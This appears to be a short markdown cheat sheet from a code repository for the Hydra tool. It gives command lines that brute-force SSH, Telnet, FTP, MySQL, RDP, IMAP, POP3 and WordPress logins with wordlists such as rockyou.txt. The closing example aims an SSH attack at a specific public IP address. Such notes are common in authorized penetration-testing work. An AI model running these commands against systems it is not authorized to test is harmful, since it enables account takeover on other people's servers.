Skip to content

Latest commit

 

History

History
44 lines (40 loc) · 1.56 KB

Hydra.md

File metadata and controls

44 lines (40 loc) · 1.56 KB

Hydra

https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

Guess SSH credentials using a given username and a list of passwords:

hydra -l username -P path/to/wordlist.txt host_ip ssh

Guess Telnet credentials using a list of usernames and a single password, specifying a non-standard port and IPv6:

hydra -L path/to/usernames.txt -p password -s port -6 host_ip telnet

Guess FTP credentials using usernames and passwords lists, specifying the number of threads:

hydra -L path/to/usernames.txt -P path/to/wordlist.txt -t n_tasks host_ip ftp

Guess MySQL credentials using a username and a passwords list, exiting when a username/password pair is found:

hydra -l username -P path/to/wordlist.txt -f host_ip mysql

Guess RDP credentials using a username and a passwords list, showing each attempt:

hydra -l username -P path/to/wordlist.txt -V rdp://host_ip

Guess IMAP credentials on a range of hosts using a list of colon-separated username/password pairs:

hydra -C path/to/username_password_pairs.txt imap://[host_range_cidr]

Guess POP3 credentials on a list of hosts using usernames and passwords lists, exiting when a username/password pair is found:

hydra -L path/to/usernames.txt -P path/to/wordlist.txt -M path/to/hosts.txt -F pop3

Hydra sobre WP

hydra -l admin -P kaonashi14M.txt www.xxxxx.com http-post-form "/wordpress/wp-login.php:user_login=^USER^&user_pass=^PASS^:Incorrect" -t 4 

Example:

hydra -l admin -P /usr/share/wordlists/rockyou.txt.gz -s 9993 82.165.37.232 -t 4 ssh